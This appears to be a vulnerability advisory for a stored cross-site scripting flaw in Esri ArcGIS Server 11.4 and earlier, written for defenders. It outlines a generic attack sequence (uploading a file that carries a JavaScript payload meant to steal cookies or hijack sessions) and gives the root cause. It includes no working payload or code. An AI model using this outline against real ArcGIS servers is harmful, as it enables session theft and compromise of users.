There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.
Esri ArcGIS Server 11.4 and earlier is vulnerable to a stored cross-site scripting (XSS) attack, allowing unauthenticated attackers to inject malicious JavaScript into the server. This vulnerability enables attackers to compromise user sessions and potentially gain control of the server through the execution of arbitrary code in a victim's browser, leading to data breaches and system compromise.
Step 1: Payload Creation: The attacker crafts a malicious file (e.g., an HTML file, a JavaScript file, or a file containing JavaScript) that includes a JavaScript payload designed to execute within a victim's browser. This payload could be designed to steal cookies, redirect users, or perform other malicious actions. Step 2: File Upload: The attacker leverages a specific functionality within ArcGIS Server (likely related to file uploads or data import) to upload the malicious file to the server. The exact upload mechanism depends on the specific configuration and exposed features of the ArcGIS Server instance. Step 3: File Storage: The ArcGIS Server, due to the vulnerability, fails to properly sanitize or validate the uploaded file's contents. The malicious file is stored on the server. Step 4: Victim Interaction: A legitimate user accesses a web page or feature within ArcGIS Server that displays or processes the uploaded file. This could be a map service, a data visualization, or any other component that interacts with user-uploaded content. Step 5: Payload Execution: The server, lacking proper output encoding, renders the malicious JavaScript code within the victim's browser. The JavaScript payload then executes, allowing the attacker to perform actions within the context of the user's session.
The vulnerability stems from insufficient input validation and output encoding within ArcGIS Server's file handling mechanisms. Specifically, the server fails to properly sanitize user-supplied data when storing files. An attacker can upload a file containing malicious JavaScript code. When a legitimate user accesses a page that displays or processes this uploaded file, the malicious script executes within the user's browser, due to the lack of proper output encoding on the server-side. The root cause is a failure to implement robust input validation and output encoding to prevent the storage and subsequent rendering of malicious HTML/JavaScript.